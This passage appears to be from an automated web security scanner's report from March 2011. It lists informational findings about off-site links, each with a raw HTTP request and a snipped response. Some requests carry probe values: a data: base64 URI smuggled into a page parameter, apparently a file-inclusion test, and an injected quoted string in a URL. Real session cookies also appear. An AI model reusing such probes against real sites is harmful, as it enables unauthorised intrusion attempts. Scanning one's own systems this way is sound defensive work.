GET /afr.php?zoneid=7&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg537292.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:18 GMT; path=/
Content-Length: 1359
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
com%2Fproducts%2Fsql-development%2Fsql-source-control%2Fim-in%3Futm_source%3Dtechnet%26utm_medium%3Drectangle%26utm_term%3D6561%26utm_content%3Dim-in%26utm_campaign%3Dsqlsourcecontrol' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/74a/74a1240f06c2724598ed5fbd2563bcd9.gif' width='300' height='250' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.32. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=5&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg670984.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:31 GMT; path=/
Content-Length: 1229
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
s=2__bannerid=272__zoneid=5__cb=c63643ecee__r_id=99f7985c5cb234240cba8ba177bd3390__r_ts=lin617__oadest=http%3A%2F%2Fvpe.sunbeltsoftware.com%2Fspeed_matters%2F%3Fadv%3D2009%26loc%3D809' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/1ed/1ed976647cddd0ee2db5150ab44964fc.jpg' width='728' height='90' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.33. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=5&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg537292.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:41:29 GMT; path=/
Content-Length: 1239
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
rid=288__zoneid=5__cb=ee3d50fee2__r_id=0bf8b62cdafb8dd33222c88485f0357f__r_ts=lin615__oadest=http%3A%2F%2Fwww.scriptlogic.com%2Flanding%2Fgoogle%2Fpa%2Findex.asp%3Fsrc%3Dtechnetmag-pa' target='_blank'><img src='http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/339/3392b230010dc5633dfb03e8ad9712fc.gif' width='728' height='90' alt='Advertisement' title='Advertisement' border='0' /></a>
...[SNIP]...
20.34. http://ezsub.net/isapi/foxisapi.dll/main.sv.run  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<center>

<a href="http://www.soundingsonline.com"><b>
...[SNIP]...
20.35. https://feedback.discoverbing.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.discoverbing.com
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&scrx=1 HTTP/1.1
Host: feedback.discoverbing.com
Connection: keep-alive
Referer: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; LNG=feedback.discoverbing.com=en-us; MSIDCookie=33f87e5c-7c8d-48b0-8858-d3cd02b35031

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 26 Mar 2011 01:00:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; expires=Sat, 26-Mar-2011 02:00:06 GMT; path=/
Set-Cookie: LNG=feedback.discoverbing.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: scrx=1; expires=Mon, 26-Mar-2012 01:00:06 GMT; path=/
Vary: Accept-Encoding
Content-Length: 26967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
</script><script type="text/javascript" defer="defer" src="https&#58;&#47;&#47;help.live.com&#47;resources&#47;neutral&#47;launchhelp.js&#63;3.19.6.0&#10;"></script>
...[SNIP]...
<span class="questiontext">Important: If you are concerned about anything you see in street-level imagery, contact Microsoft Customer Support at <a href="https://support.live.com/default.aspx?productkey=wllocal&mkt=en-us
">https://support.live.com/default.aspx?productkey=wllocal&mkt=en-us
</a>
...[SNIP]...
<li Depth="5"><a title="Your Account" href="https&#58;&#47;&#47;ssl.bing.com&#47;rewards&#47;dashboard " target="_top" keys="85802_5 85802_4 " Depth="6"><!--start85805_0-->
...[SNIP]...
<li Depth="5"><a title="FAQ" href="https&#58;&#47;&#47;ssl.bing.com&#47;rewards&#47;faq&#47;questions" target="_top" keys="85803_5 85803_4 " Depth="6"><!--start85806_0-->
...[SNIP]...
<li Depth="5"><a title="Redemption Center" href="https&#58;&#47;&#47;ssl.bing.com&#47;rewards&#47;redeem" target="_top" keys="86400_5 86400_4 " Depth="6"><!--start86401_0-->
...[SNIP]...
20.36. http://forums.smartertools.com/cssearch/SearchResults.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /cssearch/SearchResults.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cssearch/SearchResults.aspx?u=137549&o=DateDescending HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/t/33244.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:12 GMT; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.6.10.1301157836

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:39 GMT; expires=Sun, 25-Mar-2012 16:45:39 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:05:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:45:38 GMT
Content-Length: 34535


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</a>
| <a href="http://communityserver.org/r.ashx?K">Help</a>
...[SNIP]...
20.37. http://forums.smartertools.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /login.aspx?ReturnUrl=%2fAddPost.aspx%3fReplyToPostID%3d94084%26Quote%3dFalse HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/t/33244.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.5.10.1301157836; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:07 GMT; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:08 GMT; expires=Sun, 25-Mar-2012 16:45:08 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:05:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:45:08 GMT
Content-Length: 11933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</a>
| <a href="http://communityserver.org/r.ashx?K">Help</a>
...[SNIP]...
20.38. http://gfc.com/bios.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gfc.com
Path:   /bios.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bios.php?page=bios/sma HTTP/1.1
Host: gfc.com
Proxy-Connection: keep-alive
Referer: http://gfc.com/business-consulting.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:58 GMT
Server: Apache
Content-Type: text/html
Content-Length: 11859

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Gal
...[SNIP]...
<li id="facebook-link"><a href="http://www.facebook.com/#!/pages/Gallagher-Flynn-Company/147225631963663">Facebook</a>
...[SNIP]...
<li id="linkedin-link"><a href="http://www.linkedin.com/company/143836">Linked In</a>
...[SNIP]...
<li id="footer-facebook-link"><a href="http://www.facebook.com/#!/pages/Gallagher-Flynn-Company/147225631963663">Facebook</a>
...[SNIP]...
<li id="footer-linkedin-link"><a href="http://www.linkedin.com/company/143836">Linked In</a>
...[SNIP]...
<p>Website development by: <a href="http://www.ilucid.net" target="_blank">iLucid.net</a>
...[SNIP]...
20.39. http://gfc.com/human-resource-services.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gfc.com
Path:   /human-resource-services.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /human-resource-services.php?page=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1 HTTP/1.1
Host: gfc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:38 GMT
Server: Apache
Content-Type: text/html
Content-Length: 11405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Gal
...[SNIP]...
<li id="facebook-link"><a href="http://www.facebook.com/#!/pages/Gallagher-Flynn-Company/147225631963663">Facebook</a>
...[SNIP]...
<li id="linkedin-link"><a href="http://www.linkedin.com/company/143836">Linked In</a>
...[SNIP]...
<li><a href="https://gfc.enetrix.com/psitep/!stmenu_template.main?complex_id_in=407573">The Vermont Salary Survey</a>
...[SNIP]...
<div id="myContent" style="float:right;padding-left:10px;">
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player">
</a>
...[SNIP]...
<li id="footer-facebook-link"><a href="http://www.facebook.com/#!/pages/Gallagher-Flynn-Company/147225631963663">Facebook</a>
...[SNIP]...
<li id="footer-linkedin-link"><a href="http://www.linkedin.com/company/143836">Linked In</a>
...[SNIP]...
<p>Website development by: <a href="http://www.ilucid.net" target="_blank">iLucid.net</a>
...[SNIP]...
20.40. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301117928&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&dt=1301099977798&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301099977847&frm=0&adk=3965760877&ga_vid=1146980570.1301099978&ga_sid=1301099978&ga_hid=1490395764&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1426&bih=952&eid=33895132&fu=0&ifi=1&dtd=54&xpc=xkFyd1grHF&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 00:38:50 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4317
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.soundingsonline.com/archives/%2527%252BNSFTW%252B%2527%253Fordering%253D%2526searchphrase%253Dall%26hl%3Den%26client%3Dca-pub-5812731941170583%26adU%3Dwww.musiciansfriend.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEDm0GPK5jw8gUo9PqcNm60eigHqg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.41. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098783&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fsql-injection-second-order-www.insideup.com_80.htm&dt=1301080783395&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080783433&frm=0&adk=1607234649&ga_vid=546700533.1301080784&ga_sid=1301080784&ga_hid=1057915304&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=156&xpc=pAQnwvBGDQ&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:18:55 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12481
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/sql-injection-second-order-www.insideup.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26adU%3Dwww.Confio.com/SQL-Server-Query%26adT%3DSQL%2BServer%2BQuery%2BTool%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&amp;usg=AFQjCNHng2GbZPWMqcZ2xTxW0ckYGM_TKQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.42. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301159277&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fhmficweb.hinghammutual.com_80-billingview.htm&dt=1301141277072&bpp=5&shv=r20110315&jsv=r20110321-2&correlator=1301141277106&frm=0&adk=1607234649&ga_vid=1078821387.1301141277&ga_sid=1301141277&ga_hid=2117636588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=329&xpc=B80TNRf4HA&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
